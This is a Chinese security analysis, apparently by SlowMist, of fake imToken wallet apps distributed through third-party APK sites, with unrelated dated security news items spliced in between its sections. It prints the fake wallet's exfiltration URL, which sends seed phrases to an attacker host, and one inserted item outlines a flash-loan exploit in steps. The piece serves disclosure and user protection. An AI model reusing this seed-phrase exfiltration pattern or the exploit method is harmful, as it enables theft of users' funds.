COM:慢雾：Web3假钱包第三方源调查分析_ULT

背景

基于区块链技术的Web3正在驱动下一代技术革命，越来越多的人开始参与到这场加密浪潮中，但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林，身处Web3世界中，钱包则是进入Web3世界的入口以及通行证。当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中，你会发现在一条公链上每个应用都是使用钱包“登录”；这与我们传统意义上的“登录”不同，在Web2世界中，每个应用之间的账户不全是互通的。但在Web3的世界中，所有应用都是统一使用钱包去进行“登录”，我们可以看到“登录”钱包时显示的不是“LoginwithWallet”，取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。俗话说高楼之下必有阴影，在如此火热的Web3世界里，钱包作为入口级应用，自然也被黑灰产业链盯上。

慢雾：JPEG'd攻击者或已将全部6106.75枚ETH归还给项目方:8月4日消息，慢雾MistTrack监测显示，JPEG'd攻击者或已将全部6106.75枚ETH归还给项目方。[2023/8/4 16:18:46]

在Android环境下，由于很多手机不支持GooglePlay或者因为网络问题，很多人会从其他途径下载GooglePlay的应用，比如：apkcombo、apkpure等第三方下载站，这些站点往往标榜自己App是从GooglePlay镜像下载的，但是其真实安全性如何呢？网站分析

鉴于下载途径众多，我们今天以apkcombo为例看看，apkcombo是一个第三方应用市场，它提供的应用据官方说大部分来源于其他正规应用商店，但事实是否真如官方所说呢？我们先看下apkcombo的流量有多大：

慢雾：近期出现新的流行恶意盗币软件Mystic Stealer，可针对40款浏览器、70款浏览器扩展进行攻击:6月20日消息，慢雾首席信息安全官@IM_23pds在社交媒体上发文表示，近期已出现新的加密货币盗窃软件Mystic Stealer，该软件可针对40款浏览器、70款浏览器扩展、加密货币钱包进行攻击，如MetaMask、Coinbase Wallet、Binance、Rabby Wallet、OKX Wallet、OneKey等知名钱包，是目前最流行的恶意软件，请用户注意风险。[2023/6/20 21:49:05]

据数据统计站点similarweb统计，apkcombo站点：全球排名：1,809国家排名：7,370品类排名：168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件，我们发现这款插件的用户数达到了10W+：

慢雾：Equalizer Finance被黑主要在于FlashLoanProvider合约与Vault合约不兼容:据慢雾区消息，6 月 7 日，Equalizer Finance 遭受闪电贷攻击。慢雾安全团队以简讯形式将攻击原理分享如下：

1. Equalizer Finance 存在 FlashLoanProvider 与 Vault 合约，FlashLoanProvider 合约提供闪电贷服务，用户通过调用 flashLoan 函数即可通过 FlashLoanProvider 合约从 Vault 合约中借取资金，Vault 合约的资金来源于用户提供的流动性。

2. 用户可以通过 Vault 合约的 provideLiquidity/removeLiquidity 函数进行流动性提供/移除，流动性提供获得的凭证与流动性移除获得的资金都受 Vault 合约中的流动性余额与流动性凭证总供应量的比值影响。

3. 以 WBNB Vault 为例攻击者首先从 PancekeSwap 闪电贷借出 WBNB

4. 通过 FlashLoanProvider 合约进行二次 WBNB 闪电贷操作，FlashLoanProvider 会先将 WBNB Vault 合约中 WBNB 流动性转给攻击者，随后进行闪电贷回调。

5. 攻击者在二次闪电贷回调中，向 WBNB Vault 提供流动性，由于此时 WBNB Vault 中的流动性已经借出一部分给攻击者，因此流动性余额少于预期，则攻击者所能获取的流动性凭证将多于预期。

6. 攻击者先归还二次闪电贷，然后从 WBNB Vault 中移除流动性，此时由于 WBNB Vault 中的流动性已恢复正常，因此攻击者使用添加流动性获得凭证所取出的流动性数量将多于预期。

7. 攻击者通过以上方式攻击了在各个链上的 Vault 合约，耗尽了 Equalizer Finance 的流动性。

此次攻击的主要原因在于 Equalizer Finance 协议的 FlashLoanProvider 合约与 Vault 合约不兼容。慢雾安全团队建议协议在进行实际实现时应充分考虑各个模块间的兼容性。[2022/6/8 4:09:22]

那么回到我们关注的Web3领域中钱包方向，用户如果从这里下载的钱包应用安全性如何？我们拿知名的imToken钱包为例，其GooglePlay的正规下载途径为：https://play.google.com/store/apps/details?id=im.token.app

慢雾：BXH于BSC链被盗的ETH、BTC类资产已全部跨链转至相应链:11月3日消息，10月30日攻击BXH的黑客（BSC: 0x48c94305bddfd80c6f4076963866d968cac27d79）在洗币过程中，多次使用了 AnySwap、PancakeSwap、Ellipsis 等兑换平台，其中部分 ETH 代币被兑换成 BTC。此外，黑客现已将 13304.6 ETH、642.88 BTCB 代币从 BSC 链转移到 ETH、BTC 链，目前，初始黑客获利地址仍有 15546 BNB 和价值超 3376 万美元的代币。慢雾 AML 将持续监控被盗资金的转移，拉黑攻击者控制的所有钱包地址，提醒交易所、钱包注意加强地址监控，避免相关恶意资金流入平台。[2021/11/3 6:28:49]

分析 | 慢雾：韩国交易所 Bithumb XRP 钱包也疑似被黑:Twitter 上有消息称 XRP 地址（rLaHMvsPnPbiNQSjAgY8Tf8953jxQo4vnu）被盗 20,000,000 枚 XRP（价值 $6,000,000），通过慢雾安全团队的进一步分析，疑似攻击者地址（rBKRigtRR2N3dQH9cvWpJ44sTtkHiLcxz1）于 UTC 时间 03/29/2019?13:46 新建并激活，此后开始持续 50 分钟的“盗币”行为。此前慢雾安全团队第一时间披露 Bithumb EOS 钱包（g4ydomrxhege）疑似被黑，损失 3,132,672 枚 EOS，且攻击者在持续洗币。更多细节会继续披露。[2019/3/30]

由于很多手机不支持GooglePlay或者因为网络问题，很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为：https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现，apkcombo提供的版本为24.9.11，经由imToken确认后，这是一个并不存在的版本！证实这是目前市面上假imToken钱包最多的一个版本。在编写本文时imToken钱包的最新版本为2.11.3，此款钱包的版本号很高，显然是为了伪装成一个最新版本而设置的。如下图，我们在apkcombo上发现，此假钱包版本显示下载量较大，此处的下载量应该是爬取的GooglePlay的下载量信息，安全起见，我们觉得有必要披露这个恶意App的来源，防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如：uptodown下载地址：https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App，这导致钓鱼的成本变得极低：

钱包分析

在之前我们已经分析过不少假钱包的案例，如：2021-11-24我们披露：《慢雾：假钱包App已致上万人被盗，损失高达十三亿美元》，所以在此不再赘述。我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析，在开始界面创建钱包或导入钱包助记词时，虚假钱包会将助记词等信息发送到钓鱼网站的服务端去，如下图：

根据逆向APK代码和实际分析流量包发现，助记词发送方式：https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图，最早的“api.funnel.rocks”证书出现在2022-06-03，也就是攻击开始的大概时间：

俗话说一图胜千言，最后我们画一个流程图：

总结

目前这种局活动不仅活跃，甚至有扩大范围的趋势，每天都有新的受害者受。用户作为安全体系最薄弱的环节，应时刻保持怀疑之心，增强安全意识与风险意识，当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证；如果你的钱包从上述镜像站下载，请第一时间转移资产并卸载该软件，必要时可通过官方验证通道核实。同时，如需使用钱包，请务必认准以下主流钱包App官方网址：1/imToken钱包：https://token.im/2/TokenPocket钱包：https://www.tokenpocket.pro/3/TronLink钱包：https://www.tronlink.org/4/比特派钱包：https://bitpie.com/5/MetaMask钱包：https://metamask.io/6/TrustWallet：https://trustwallet.com/请持续关注慢雾安全团队，更多Web3安全风险分析与告警正在路上。致谢：感谢在溯源过程中imToken官方提供的验证支持。由于保密性和隐私性，本文只是冰山一角。慢雾在此建议，用户需加强对安全知识的了解，进一步强化甄别网络钓鱼攻击的能力等，避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

标签：COMVAULTWEBULTcombo币圈Vault Hill Cityweb3.0币种Vulture Peak

BNB热门资讯